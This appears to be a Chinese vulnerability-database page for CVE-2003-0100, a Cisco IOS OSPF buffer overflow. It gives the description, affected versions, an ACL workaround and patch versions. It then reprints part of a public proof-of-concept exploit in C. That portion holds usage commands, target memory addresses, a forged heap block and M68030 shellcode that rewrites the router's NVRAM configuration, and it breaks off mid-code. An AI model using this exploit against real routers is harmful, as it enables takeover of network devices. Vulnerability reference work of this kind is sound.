CVE-2003-0100
CVSS7.5
发布时间 :2003-03-03 00:00:00
修订时间 :2016-10-17 22:29:29
NMCOE    

[原文]Buffer overflow in Cisco IOS 11.2.x to 12.0.x allows remote attackers to cause a denial of service and possibly execute commands via a large number of OSPF neighbor announcements.


[CNNVD]Cisco IOS OSPF远程缓冲区溢出漏洞(CNNVD-200303-026)

        
        Internet Operating System (IOS)是一款使用于CISCO路由器上的操作系统。
        CISCO IOS在处理畸形OSPF包时存在缓冲区溢出,远程攻击者可以利用这个漏洞可能在设备上执行恶意指令及进行恶意拒绝服务攻击。
        部分Cisco IOS版本中包含的OSPF实现在一个接口上接收到超过255个OSPF邻居的通告时,会发生IO内存结构破坏,FX of Phenoelit研究提供了利用这个漏洞在路由器上执行恶意代码及的程序。
        Cisco Bug CSCdp58462对此漏洞进行了详细描述。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:cisco:ios:12.0%284%29xeCisco IOS 12.0 (4)XE
cpe:/o:cisco:ios:12.0%2817%29st5Cisco IOS 12.0 (17)ST5
cpe:/o:cisco:ios:12.0%2817%29st1Cisco IOS 12.0 (17)ST1
cpe:/o:cisco:ios:12.0%284%29xmCisco IOS 12.0 (4)XM
cpe:/o:cisco:ios:12.0%2816.06%29sCisco IOS 12.0 (16.06)S
cpe:/o:cisco:ios:11.2%2826b%29Cisco IOS 11.2 (26b)
cpe:/o:cisco:ios:12.0%2811%29s6Cisco IOS 12.0 (11)S6
cpe:/o:cisco:ios:11.3naCisco IOS 11.3 NA
cpe:/o:cisco:ios:12.0%2810%29w5%2818f%29Cisco IOS 12.0 (10)W5(18f)
cpe:/o:cisco:ios:11.2%2819a%29gs6Cisco IOS 11.2 (19a)GS6
cpe:/o:cisco:ios:12.0%287%29wx5%2815a%29Cisco IOS 12.0 (7)WX5(15a)
cpe:/o:cisco:ios:12.0%281%29xbCisco IOS 12.0.1 XB
cpe:/o:cisco:ios:11.3%2811c%29Cisco IOS 11.3 (11c)
cpe:/o:cisco:ios:12.0%284%29xm1Cisco IOS 12.0 (4)XM1
cpe:/o:cisco:ios:12.0%2817%29s4Cisco IOS 12.0 (17)S4
cpe:/o:cisco:ios:12.0%281%29xeCisco IOS 12.0.1 XE
cpe:/o:cisco:ios:12.0%2810%29w5Cisco IOS 12.0 (10)W5
cpe:/o:cisco:ios:11.1%2813%29caCisco IOS 11.1.13 CA
cpe:/o:cisco:ios:11.3maCisco IOS 11.3 MA
cpe:/o:cisco:ios:12.0%283%29t2Cisco IOS 12.0.3 T2
cpe:/o:cisco:ios:12.0%284%29sCisco IOS 12.0.4 S
cpe:/o:cisco:ios:11.2%284%29xaCisco IOS 11.2 (4)XA
cpe:/o:cisco:ios:12.0%2810%29w5%2818g%29Cisco IOS 12.0 (10)W5(18g)
cpe:/o:cisco:ios:12.0%2815a%29Cisco IOS 12.0 (15a)
cpe:/o:cisco:ios:12.0%284%29tCisco IOS 12.0.4 T
cpe:/o:cisco:ios:11.1iaCisco IOS 11.1 IA
cpe:/o:cisco:ios:11.3%2811b%29Cisco IOS 11.3 (11b)
cpe:/o:cisco:ios:12.0%285%29wcCisco IOS 12.0 (5)WC 2900XL-LRE
cpe:/o:cisco:ios:12.0%2813%29w5%2819c%29Cisco IOS 12.0 (13)W5(19c)
cpe:/o:cisco:ios:12.0%2810a%29Cisco IOS 12.0 (10a)
cpe:/o:cisco:ios:12.0%2813%29s6Cisco IOS 12.0 (13)S6
cpe:/o:cisco:ios:12.0%2817%29Cisco IOS 12.0 (17)
cpe:/o:cisco:ios:12.0%2818b%29Cisco IOS 12.0 (18b)
cpe:/o:cisco:ios:12.0%286b%29Cisco IOS 12.0 (6b)
cpe:/o:cisco:ios:12.0%287%29s1Cisco IOS 12.0 (7)S1
cpe:/o:cisco:ios:12.0%285%29wxCisco IOS 12.0 (5)WX
cpe:/o:cisco:ios:12.0%288.3%29scCisco IOS 12.0 (8.3)SC
cpe:/o:cisco:ios:11.2%2819%29gs0.2Cisco IOS 11.2 (19)GS0.2
cpe:/o:cisco:ios:11.3%287%29db1Cisco IOS 11.3 (7)DB1
cpe:/o:cisco:ios:11.1%2815%29iaCisco IOS 11.1.15 IA
cpe:/o:cisco:ios:11.1%2817%29ccCisco IOS 11.1.17 CC
cpe:/o:cisco:ios:12.0%2816%29s8Cisco IOS 12.0 (16)S8
cpe:/o:cisco:ios:11.3%281%29tCisco IOS 11.3.1 T
cpe:/o:cisco:ios:12.0%2816%29sc3Cisco IOS 12.0 (16)SC3
cpe:/o:cisco:ios:12.0xpCisco IOS 12.0XP
cpe:/o:cisco:ios:12.0xjCisco IOS 12.0XJ
cpe:/o:cisco:ios:12.0xiCisco IOS 12.0XI
cpe:/o:cisco:ios:12.0%287%29scCisco IOS 12.0 (7)SC
cpe:/o:cisco:ios:12.0xsCisco IOS 12.0XS
cpe:/o:cisco:ios:12.0xnCisco IOS 12.0XN
cpe:/o:cisco:ios:12.0xmCisco IOS 12.0XM
cpe:/o:cisco:ios:12.0xhCisco IOS 12.0XH
cpe:/o:cisco:ios:12.0%281%29xa3Cisco IOS 12.0.1 XA3
cpe:/o:cisco:ios:12.0xgCisco IOS 12.0XG
cpe:/o:cisco:ios:11.1%2815%29aaCisco IOS 11.1.15 AA
cpe:/o:cisco:ios:12.0xlCisco IOS 12.0XL
cpe:/o:cisco:ios:12.0%281%29Cisco IOS 12.0.1
cpe:/o:cisco:ios:12.0xkCisco IOS 12.0XK
cpe:/o:cisco:ios:12.0%287%29xk3Cisco IOS 12.0 (7)XK3
cpe:/o:cisco:ios:12.0xfCisco IOS 12.0XF
cpe:/o:cisco:ios:12.0xeCisco IOS 12.0XE
cpe:/o:cisco:ios:12.0%2815%29s3Cisco IOS 12.0 (15)S3
cpe:/o:cisco:ios:11.2gsCisco IOS 11.2 GS
cpe:/o:cisco:ios:12.0wxCisco IOS 12.0WX
cpe:/o:cisco:ios:12.0Cisco IOS 12.0
cpe:/o:cisco:ios:12.0xdCisco IOS 12.0XD
cpe:/o:cisco:ios:12.0xcCisco IOS 12.0XC
cpe:/o:cisco:ios:12.0%2815%29s6Cisco IOS 12.0 (15)S6
cpe:/o:cisco:ios:12.0xrCisco IOS 12.0XR
cpe:/o:cisco:ios:11.1%2824a%29Cisco IOS 11.1 (24a)
cpe:/o:cisco:ios:12.0xqCisco IOS 12.0XQ
cpe:/o:cisco:ios:11.2%2823a%29bc1Cisco IOS 11.2 (23a)BC1
cpe:/o:cisco:ios:12.0%2816%29st1Cisco IOS 12.0 (16)ST1
cpe:/o:cisco:ios:12.0wtCisco IOS 12.0WT
cpe:/o:cisco:ios:12.0%2813a%29Cisco IOS 12.0 (13a)
cpe:/o:cisco:ios:12.0%282%29Cisco IOS 12.0.2
cpe:/o:cisco:ios:12.0%285%29wc3Cisco IOS 12.0 (5)WC3
cpe:/o:cisco:ios:12.0wcCisco IOS 12.0WC
cpe:/o:cisco:ios:12.0%2814%29w5%2820%29Cisco IOS 12.0 (14)W5(20)
cpe:/o:cisco:ios:12.0%2810%29s7Cisco IOS 12.0 (10)S7
cpe:/o:cisco:ios:12.0%287%29dc1Cisco IOS 12.0 (7)DC1
cpe:/o:cisco:ios:11.1caCisco IOS 11.1 CA
cpe:/o:cisco:ios:12.0%287%29db2Cisco IOS 12.0 (7)DB2
cpe:/o:cisco:ios:11.1ccCisco IOS 11.1CC
cpe:/o:cisco:ios:11.3xaCisco IOS 11.3 XA
cpe:/o:cisco:ios:12.0%285.1%29xpCisco IOS 12.0(5.1)XP
cpe:/o:cisco:ios:11.3%281%29edCisco IOS 11.3.1 ED
cpe:/o:cisco:ios:12.0%285%29wc2Cisco IOS 12.0 (5)WC2
cpe:/o:cisco:ios:11.2%2817%29Cisco IOS 11.2(17)
cpe:/o:cisco:ios:11.1%2816%29iaCisco IOS 11.1.16 IA
cpe:/o:cisco:ios:11.3haCisco IOS 11.3 HA
cpe:/o:cisco:ios:11.1%289%29iaCisco IOS 11.1.9 IA
cpe:/o:cisco:ios:11.2%284%29fCisco IOS 11.2.4 F
cpe:/o:cisco:ios:11.1ctCisco IOS 11.1CT
cpe:/o:cisco:ios:11.2%284%29Cisco IOS 11.2.4
cpe:/o:cisco:ios:12.0w5Cisco IOS 12.0W5
cpe:/o:cisco:ios:11.3%288%29db2Cisco IOS 11.3 (8)DB2
cpe:/o:cisco:ios:12.0%285%29wc3bCisco IOS 12.0 (5)WC3b
cpe:/o:cisco:ios:11.1%2813%29aaCisco IOS 11.1.13 AA
cpe:/o:cisco:ios:11.2wa3Cisco IOS 11.2 WA3
cpe:/o:cisco:ios:12.0%2814%29stCisco IOS 12.0 (14)ST
cpe:/o:cisco:ios:11.2wa4Cisco IOS 11.2 WA4
cpe:/o:cisco:ios:12.0%288%29s1Cisco IOS 12.0 (8)S1
cpe:/o:cisco:ios:12.0%289%29sCisco IOS 12.0(9)S
cpe:/o:cisco:ios:12.0%2816a%29Cisco IOS 12.0 (16a)
cpe:/o:cisco:ios:12.0%281%29wCisco IOS 12.0.1 W
cpe:/o:cisco:ios:11.1aaCisco IOS 11.1 AA
cpe:/o:cisco:ios:11.3%282%29xaCisco IOS 11.3 (2)XA
cpe:/o:cisco:ios:12.0%2817%29sl6Cisco IOS 12.0 (17)SL6
cpe:/o:cisco:ios:11.3%2811%29bCisco IOS 11.3.11 b
cpe:/o:cisco:ios:12.0%2817%29sl2Cisco IOS 12.0 (17)SL2
cpe:/o:cisco:ios:12.0%285%29yb4Cisco IOS 12.0 (5)YB4
cpe:/o:cisco:ios:12.0%287%29xf1Cisco IOS 12.0 (7)XF1
cpe:/o:cisco:ios:12.0stCisco IOS 12.0ST
cpe:/o:cisco:ios:12.0%2811a%29Cisco IOS 12.0 (11a)
cpe:/o:cisco:ios:11.3%2811b%29t2Cisco IOS 11.3 (11b)T2
cpe:/o:cisco:ios:12.0sxCisco IOS 12.0SX
cpe:/o:cisco:ios:12.0%289%29s8Cisco IOS 12.0 (9)S8
cpe:/o:cisco:ios:12.0spCisco IOS 12.0SP
cpe:/o:cisco:ios:12.0%284%29xe1Cisco IOS 12.0 (4)XE1
cpe:/o:cisco:ios:11.2fCisco IOS 11.2 F
cpe:/o:cisco:ios:11.3dbCisco IOS 11.3DB
cpe:/o:cisco:ios:11.3daCisco IOS 11.3 DA
cpe:/o:cisco:ios:12.0scCisco IOS 12.0SC
cpe:/o:cisco:ios:11.2%2826a%29Cisco IOS 11.2 (26a)
cpe:/o:cisco:ios:11.2bcCisco IOS 11.2 BC
cpe:/o:cisco:ios:11.2%2810%29bcCisco IOS 11.2.10 BC
cpe:/o:cisco:ios:12.0%2814%29st3Cisco IOS 12.0 (14)ST3
cpe:/o:cisco:ios:12.0%2817%29sCisco IOS 12.0 (17)S
cpe:/o:cisco:ios:11.1%2836%29ca2Cisco IOS 11.1 (36)CA2
cpe:/o:cisco:ios:11.2%288%29pCisco IOS 11.2.8 P
cpe:/o:cisco:ios:12.0%2813%29wt6%281%29Cisco IOS 12.0 (13)WT6(1)
cpe:/o:cisco:ios:11.2saCisco IOS 11.2 SA
cpe:/o:cisco:ios:12.0slCisco IOS 12.0SL
cpe:/o:cisco:ios:12.0%285.4%29wc1Cisco IOS 12.0 (5.4)WC1
cpe:/o:cisco:ios:12.0%2814%29s7Cisco IOS 12.0 (14)S7
cpe:/o:cisco:ios:12.0%282%29xfCisco IOS 12.0.2 XF
cpe:/o:cisco:ios:12.0%282%29xgCisco IOS 12.0.2 XG
cpe:/o:cisco:ios:12.0%282%29xdCisco IOS 12.0.2 XD
cpe:/o:cisco:ios:12.0%282%29xeCisco IOS 12.0 (2)XE
cpe:/o:cisco:ios:11.1%2828a%29iaCisco IOS 11.1 (28a)IA
cpe:/o:cisco:ios:12.0%287%29xe2Cisco IOS 12.0 (7)XE2
cpe:/o:cisco:ios:11.3tCisco IOS 11.3T
cpe:/o:cisco:ios:12.0%282%29xcCisco IOS 12.0.2 XC
cpe:/o:cisco:ios:11.2%2811b%29t2Cisco IOS 11.2 (11b)T2
cpe:/o:cisco:ios:11.2pCisco IOS 11.2P
cpe:/o:cisco:ios:11.3wa4Cisco IOS 11.3 WA4
cpe:/o:cisco:ios:11.1Cisco IOS 11.1
cpe:/o:cisco:ios:12.0%283d%29Cisco IOS 12.0 (3d)
cpe:/o:cisco:ios:12.0tCisco IOS 12.0T
cpe:/o:cisco:ios:12.0sCisco IOS 12.0S
cpe:/o:cisco:ios:12.0%283%29Cisco IOS 12.0.3
cpe:/o:cisco:ios:11.3Cisco IOS 11.3
cpe:/o:cisco:ios:11.2Cisco IOS 11.2
cpe:/o:cisco:ios:12.0%282b%29Cisco IOS 12.0 (2b)
cpe:/o:cisco:ios:12.0%285%29xk2Cisco IOS 12.0 (5)XK2
cpe:/o:cisco:ios:12.0%287%29tCisco IOS 12.0(7)T
cpe:/o:cisco:ios:12.0%289a%29Cisco IOS 12.0 (9a)
cpe:/o:cisco:ios:12.0%287%29xkCisco IOS 12.0 (7)XK
cpe:/o:cisco:ios:12.0%287%29xeCisco IOS 12.0 (7)XE
cpe:/o:cisco:ios:12.0xbCisco IOS 12.0XB
cpe:/o:cisco:ios:12.0%287%29xfCisco IOS 12.0 (7)XF
cpe:/o:cisco:ios:12.0xaCisco IOS 12.0XA
cpe:/o:cisco:ios:12.0%285.2%29xuCisco IOS 12.0 (5.2)XU
cpe:/o:cisco:ios:11.2%289%29pCisco IOS 11.2.9 P
cpe:/o:cisco:ios:11.1%2836%29cc2Cisco IOS 11.1 (36)CC2
cpe:/o:cisco:ios:11.1%2836%29cc4Cisco IOS 11.1 (36)CC4
cpe:/o:cisco:ios:11.2xaCisco IOS 11.2 XA
cpe:/o:cisco:ios:12.0xwCisco IOS 12.0 XW
cpe:/o:cisco:ios:11.1%2824b%29Cisco IOS 11.1 (24b)
cpe:/o:cisco:ios:11.2%2826%29p2Cisco IOS 11.2 (26)P2
cpe:/o:cisco:ios:12.0%287%29xvCisco IOS 12.0 (7)XV
cpe:/o:cisco:ios:12.0%2814a%29Cisco IOS 12.0 (14a)
cpe:/o:cisco:ios:12.0xvCisco IOS 12.0Xv
cpe:/o:cisco:ios:12.0%2818%29st1Cisco IOS 12.0 (18)ST1
cpe:/o:cisco:ios:12.0xuCisco IOS 12.0XU
cpe:/o:cisco:ios:11.1%2817%29ctCisco IOS 11.1.17 CT
cpe:/o:cisco:ios:11.1%2813%29iaCisco IOS 11.1.13 IA
cpe:/o:cisco:ios:11.3aaCisco IOS 11.3AA
cpe:/o:cisco:ios:12.0%2818%29s5Cisco IOS 12.0 (18)S5
cpe:/o:cisco:ios:12.0%285.3%29wc1Cisco IOS 12.0 (5.3)WC1
cpe:/o:cisco:ios:12.0%289%29Cisco IOS 12.0 (9)
cpe:/o:cisco:ios:11.2%284%29f1Cisco IOS 11.2.4 F1
cpe:/o:cisco:ios:12.0%285%29xkCisco IOS 12.0 (5)XK
cpe:/o:cisco:ios:12.0%285%29xeCisco IOS 12.0 (5)XE
cpe:/o:cisco:ios:11.2%288%29sa1Cisco IOS 11.2.8 SA1
cpe:/o:cisco:ios:12.0%285%29xnCisco IOS 12.0 (5)XN
cpe:/o:cisco:ios:12.0%2816%29w5%2821%29Cisco IOS 12.0 (16)W5(21)
cpe:/o:cisco:ios:11.1%2828a%29ctCisco IOS 11.1 (28a)CT
cpe:/o:cisco:ios:11.1%2815%29caCisco IOS 11.1.15 CA
cpe:/o:cisco:ios:12.0%285%29xuCisco IOS 12.0 (5)XU
cpe:/o:cisco:ios:12.0%288.0.2%29sCisco IOS 12.0 (8.0.2)S
cpe:/o:cisco:ios:11.1%287%29caCisco IOS 11.1.7 CA
cpe:/o:cisco:ios:12.0%2818%29w5%2822b%29Cisco IOS 12.0 (18)W5(22b)
cpe:/o:cisco:ios:11.2%288%29sa5Cisco IOS 11.2.8 SA5
cpe:/o:cisco:ios:12.0%2817a%29Cisco IOS 12.0 (17a)
cpe:/o:cisco:ios:12.0%287%29t2Cisco IOS 12.0 (7)T2
cpe:/o:cisco:ios:12.0%287.4%29sCisco IOS 12.0 (7.4)S
cpe:/o:cisco:ios:12.0%288a%29Cisco IOS 12.0 (8a)
cpe:/o:cisco:ios:11.1%2820%29aa4Cisco IOS 11.1 (20)AA4
cpe:/o:cisco:ios:11.2%288%29sa3Cisco IOS 11.2.8 SA3
cpe:/o:cisco:ios:12.0%285%29xsCisco IOS 12.0 (5)XS
cpe:/o:cisco:ios:12.0%285%29xn1Cisco IOS 12.0 (5)XN1
cpe:/o:cisco:ios:12.0%2811%29st4Cisco IOS 12.0 (11)ST4
cpe:/o:cisco:ios:12.0%285%29wc2bCisco IOS 12.0 (5)WC2b
cpe:/o:cisco:ios:11.1%2816%29aaCisco IOS 11.1.16 AA
cpe:/o:cisco:ios:11.1%2813%29Cisco IOS 11.1.13
cpe:/o:cisco:ios:12.0%2812a%29Cisco IOS 12.0 (12a)
cpe:/o:cisco:ios:11.2%284%29xafCisco IOS 11.2 (4)XAf
cpe:/o:cisco:ios:11.2%288.9%29sa6Cisco IOS 11.2 (8.9)SA6
cpe:/o:cisco:ios:12.0%285%29t1Cisco IOS 12.0(5)T1
cpe:/o:cisco:ios:12.0%2812%29s3Cisco IOS 12.0 (12)S3
cpe:/o:cisco:ios:11.1%287%29aaCisco IOS 11.1.7 AA
cpe:/o:cisco:ios:12.0dcCisco IOS 12.0DC
cpe:/o:cisco:ios:12.0%288%29Cisco IOS 12.0(8)
cpe:/o:cisco:ios:12.0%285%29tCisco IOS 12.0 (5)T
cpe:/o:cisco:ios:11.2%289%29xaCisco IOS 11.2.9 XA
cpe:/o:cisco:ios:12.0%287a%29Cisco IOS 12.0 (7a)
cpe:/o:cisco:ios:12.0%2818%29sCisco IOS 12.0 (18)S
cpe:/o:cisco:ios:12.0dbCisco IOS 12.0DB
cpe:/o:cisco:ios:12.0daCisco IOS 12.0DA

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5565Cisco IOS OSPF Buffer Overflow Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0100
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0100
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-026
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=104576100719090&w=2
(UNKNOWN)  BUGTRAQ  20030220 Cisco IOS OSPF exploit
http://marc.info/?l=bugtraq&m=104587206702715&w=2
(UNKNOWN)  BUGTRAQ  20030221 Re: Cisco IOS OSPF exploit
http://www.iss.net/security_center/static/11373.php
(VENDOR_ADVISORY)  XF  cisco-ios-ospf-bo(11373)
http://www.securityfocus.com/bid/6895
(UNKNOWN)  BID  6895

- 漏洞信息

Cisco IOS OSPF远程缓冲区溢出漏洞
高危 边界条件错误
2003-03-03 00:00:00 2005-05-13 00:00:00
远程  
        
        Internet Operating System (IOS)是一款使用于CISCO路由器上的操作系统。
        CISCO IOS在处理畸形OSPF包时存在缓冲区溢出,远程攻击者可以利用这个漏洞可能在设备上执行恶意指令及进行恶意拒绝服务攻击。
        部分Cisco IOS版本中包含的OSPF实现在一个接口上接收到超过255个OSPF邻居的通告时,会发生IO内存结构破坏,FX of Phenoelit研究提供了利用这个漏洞在路由器上执行恶意代码及的程序。
        Cisco Bug CSCdp58462对此漏洞进行了详细描述。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在路由器上配置使用OSPF MD5验证。
        * 设置正确的访问控制允许部分OSPF邻居访问:
        access-list 100 permit ospf host a.b.c.x host 224.0.0.5
        access-list 100 permit ospf host a.b.c.x host interface_ip
        access-list 100 permit ospf host a.b.c.y host 224.0.0.5
        access-list 100 permit ospf host a.b.c.y host interface_ip
        access-list 100 permit ospf host a.b.c.z host 224.0.0.5
        access-list 100 permit ospf host a.b.c.z host interface_ip
        access-list 100 permit ospf any host 224.0.0.6
        access-list 100 deny ospf any any
        access-list 100 permit ip any any
        厂商补丁:
        Cisco
        -----
        Cisco IOS版本11.1 - 12.0存在此漏洞,Cisco在如下IOS版本中已经修补此漏洞:
        12.0(19)S
        12.0(19)ST
        12.1(1)
        12.1(1)DB
        12.1(1)DC
        12.1(1)T
        及之后的版本。
        
        http://www.cisco.com/warp/public/707/advisory.html

- 漏洞信息 (22271)

Cisco IOS 11/12 OSPF Neighbor Buffer Overflow Vulnerability (EDBID:22271)
hardware remote
2003-02-20 Verified
0 FX
N/A [点击下载]
source: http://www.securityfocus.com/bid/6895/info

Cisco IOS is prone to a remotely exploitable buffer overflow condition when handling malformed OSPF (Open Shortest Path First) packets. The overflow occurs when more than 255 OSPF neighbors are announced. This may make it possible to execute malicious instructions on a device running a vulnerable version of the software. Denial of service is also possible.

/* Cisco IOS IO memory exploit prove of concept 
 * by FX of Phenoelit <fx@phenoelit.de>
 * http://www.phenoelit.de
 *
 * For: 
 * 	19C3 Chaos Communication Congress 2002 / Berlin
 * 	BlackHat Briefings Seattle 2003
 * 
 * Cisco IOS 11.2.x to 12.0.x OSPF neighbor overflow
 * Cisco Bug CSCdp58462 causes more than 255 OSPF neighbors to overflow a IO memory
 * structure (small buffer header). The attached program is a PoC to exploit 
 * this vulnerability by executing "shell code" on the router and write the 
 * attached configuration into NVRAM to basicaly own the router. 
 *
 * Example:
 * linux# gcc -o OoopSPF OoopSPF.c 
 * linux# ./OoopSPF -s 172.16.0.0 -n 255.255.0.0 -d 172.16.1.4 \
 * 	-f ./small.config -t 0 -a 1.2.3.4 -vv
 *
 * You can see if it worked if a) the router does not crash and b) the output of 
 * "show mem io" looks like this:
 * E40E38      264 E40D04   E40F6C     1                  31632D8   *Packet Data*
 * E40F6C      264 E40E38   E410A0     1                  31632D8   *Packet Data*
 * E410A0      264 E40F6C   E411D4     1                  31632D8   *Packet Data*
 * E411D4  1830400 E410A0   0          0  0       E411F8  808A8B8C  [PHENOELIT]
 *
 * Exploit has to be "triggered". In LAB environment, go to the router and say
 * box# conf t
 * box(config)# buffers small perm 0
 *
 * Greets go to the Phenoelit members, the usual suspects Halvar, Johnny Cyberpunk,
 *   Svoern, Scusi, Pandzilla, and Dizzy, to the #phenoelit people,
 *   Gaus of PSIRT, Nico of Securite.org and Dan Kaminsky.
 *
 * $Id: OoopSPF.c,v 1.4 2003/02/20 16:38:30 root Exp root $
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <errno.h>
#include <time.h>

#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>

#define IPTTL			0x80
#define BLABLA			"Phenoelit OoopSPF\n" \
				" Cisco IOS OSPF remote exploit (11.2.-12.0)\n" \
				" (C) 2002/2003 - FX of Phenoelit <fx@phenoelit.de>\n" 
#define IPPROTO_OSPF    0x59
#define IP_ADDR_LEN     4
typedef struct {
        u_int8_t        ihl:4,          /* header length */
                        version:4;      /* version */
        u_int8_t        tos;            /* type of service */
        u_int16_t       tot_len;        /* total length */
        u_int16_t       id;             /* identification */
        u_int16_t       off;            /* fragment offset field */
        u_int8_t        ttl;            /* time to live */
        u_int8_t        protocol;       /* protocol */
        u_int16_t       check;          /* checksum */
        struct in_addr  saddr;
        struct in_addr  daddr;          /* source and dest address */
} iphdr_t;

typedef struct {
    u_int8_t    version                 __attribute__ ((packed));
    u_int8_t    type                    __attribute__ ((packed));
    u_int16_t   length                  __attribute__ ((packed));
    u_int8_t    source[4]               __attribute__ ((packed));
    u_int8_t    area[4]                 __attribute__ ((packed));
    u_int16_t   checksum                __attribute__ ((packed));
    u_int16_t   authtype                __attribute__ ((packed));
    u_int8_t    authdata[8]             __attribute__ ((packed));
} ospf_header_t;

typedef struct {
    u_int8_t    netmask[4]              __attribute__ ((packed));
    u_int16_t   hello_interval          __attribute__ ((packed));
    u_int8_t    options                 __attribute__ ((packed));
    u_int8_t    priority                __attribute__ ((packed));
    u_int8_t    dead_interval[4]        __attribute__ ((packed));
    u_int8_t    designated[4]           __attribute__ ((packed));
    u_int8_t    backup[4]               __attribute__ ((packed));
} ospf_hello_t;


//
// Target definitions 
//

typedef struct {
    char	*description;
    int		n_neig;
    int		data_start;
    u_int32_t	blockbegin;
    u_int32_t	prev;
    u_int32_t	nop_sleet;
    u_int32_t	stack_address;
    u_int32_t	iomem_end;
} targets_t;

targets_t	targets[] = {
    { // #0 Phenoelit labs 2503 
	"2503, 11.3(11b) IP only [c2500-i-l.113-11b.bin], 14336K/2048K (working)",
	256,		// # of neighbor announcements 
	0xe5, 		// data start
	0xE411D4,	// block begin
	0xE410B4,	// PREV
	6,		// nop_sleet after FAKE BLOCK
	0x079B48,	// Check heaps stack PC
	0x00FFFFFF	// IO mem end
    },
    { // #1 Phenoelit labs 2501 
	"2501, 11.3(11a) IP only [c2500-i-l.113-11a.bin], 14336K/2048K (working)",
	256,		// # of neighbor announcements 
	0xe5, 		// data start
	0x00E31EA4,	// block begin
	0x00E31D84,	// PREV
	6,		// nop_sleet after FAKE BLOCK
	0x00079918,	// Check heaps stack PC (using IOStack.pl)
	0x00FFFFFF	// IO mem end
    }
};

#define TARGETS (sizeof(targets)/sizeof(targets_t)-1)

//
// NVRAM header structure
//

typedef struct {
    u_int16_t   magic                   __attribute__((packed));
    u_int16_t   one                     __attribute__((packed));
    u_int16_t   checksum                __attribute__((packed));
    u_int16_t   IOSver                  __attribute__((packed));
    u_int32_t   unknown                 __attribute__((packed));
    u_int32_t   ptr                     __attribute__((packed));
    u_int32_t   size                    __attribute__((packed));
} nvheader_t;

//
// FAKE BLOCK definitions
//

typedef struct {
    u_int32_t	redzone		__attribute__((packed));
    u_int32_t	magic		__attribute__((packed));
    u_int32_t	pid		__attribute__((packed));
    u_int32_t	proc		__attribute__((packed));
    u_int32_t	name		__attribute__((packed));
    u_int32_t	pc		__attribute__((packed));
    u_int32_t	next		__attribute__((packed));
    u_int32_t	prev		__attribute__((packed));
    u_int32_t	size		__attribute__((packed));
    u_int32_t	refcnt		__attribute__((packed));
    u_int32_t	pad1		__attribute__((packed));
    u_int32_t	freemagic	__attribute__((packed));
    u_int32_t	lastdealloc	__attribute__((packed));
    u_int32_t	pad2		__attribute__((packed));
    u_int32_t	pad3		__attribute__((packed));
    u_int32_t	free_next	__attribute__((packed));
    u_int32_t	free_prev	__attribute__((packed));
} block_t;

char		fakeblock[] =
        "\xFD\x01\x10\xDF"      // RED
        "\xAB\x12\x34\xCD"      // MAGIC
        "\xFF\xFF\xFF\xFF"      // PID
        "\x80\x81\x82\x83"      // PROC
        "\x00\xE4\x12\x00"      // NAME	(Message)
        "\x80\x8a\x8b\x8c"      // PC
	"\x00\x00\x00\x00"      // NEXT (no following block)
        "\x00\xE4\x10\xB4"      // PREV (correct for 0xE411d4)
	"\x00\x0D\xF7\x02"      // Size CORRECT for 0xE411D4
        "\x00\x00\x00\x00"      // Reference count
        "\x00\x00\x00\x00"      // PADDING
        "\xDE\xAD\xBE\xEF"      // FREE MAGIC
	"[PHE"			// last delocator
	"NOEL"			// PADDING
	"IT]\x00"		// PADDING
	"\x00\xE4\x12\x20"	// FREE NEXT in our block
	"\x00\x07\x9B\x48"	// FREE PREV (Check heaps stack PC)
	;
block_t		*bpatch = (block_t*)fakeblock;

//
// Cisco code for M68030 CPU and 2500 NVRAM layout
//
char		ccode[] =
        "\x46\xFC\x27\x00"              //movew #9984,%sr (0x00E41220)
        "\x43\xFA\x00\x48"              //lea %pc@(4e <config>),%a1 (0x00E41224)
        "\x24\x7C\x02\x00\x00\x06"      //moveal #33554438,%a2 (0x00E41228)
        "\xB3\x81"                      //eorl %d1,%d1 (0x00E4122E)
        "\x74\x01"                      //moveq #1,%d2 (0x00E41230)
        "\x22\x3C\x01\x01\x01\x01"      //movel #16843009,%d1 (0x00E41232)
        "\x14\xD9"                      //moveb %a1@+,%a2@+ (0x00E41238)
        "\x32\x3C\xFF\xFF"              //movew #-1,%d1 (0x00E4123A)
        "\x93\x42"                      //subxw %d2,%d1 (0x00E4123E)
        "\x6B\x00\xFF\xFC"              //bmiw 1e <write_delay> (0x00E41240)
        "\x0C\x91\xCA\xFE\xF0\x0D"      //cmpil #-889262067,%a1@ (0x00E41244)
        "\x66\x00\xFF\xEC"              //bnew 18 <copy_config> (0x00E4124A)
        "\x14\xFC\x00\x00"              //moveb #0,%a2@+ (0x00E4124E)
        "\x32\x3C\xFF\xFF"              //movew #-1,%d1 (0x00E41252)
        "\x93\x42"                      //subxw %d2,%d1 (0x00E41256)
        "\x6B\x00\xFF\xFC"              //bmiw 36 <write_delay2> (0x00E41258)
        "\xB5\xFC\x02\x00\x07\x00"      //cmpal #33556224,%a2 (0x00E4125C)
        "\x6D\x00\xFF\xEA"              //bltw 2e <delete_config> (0x00E41262)
        "\x22\x7C\x03\x00\x00\x60"      //moveal #50331744,%a1 (0x00E41266)
        "\x4E\xD1"                      //jmp %a1@ (0x00E4126C)

    ;

char		terminator[]	= "\xCA\xFE\xF0\x0D";
char		nop[] 		= "\x4E\x71";

//
// Global variables to pass the current buffer location to the 
// OSPF packet generator function
//
int 		payloadc=0;
char		*payload=NULL;
// packet counter (global)
unsigned int 	pc=0;


//
// Configuration
//
struct {
    int			verbose;
    char		*device;
    struct in_addr	*target;
    u_int32_t		src_net;
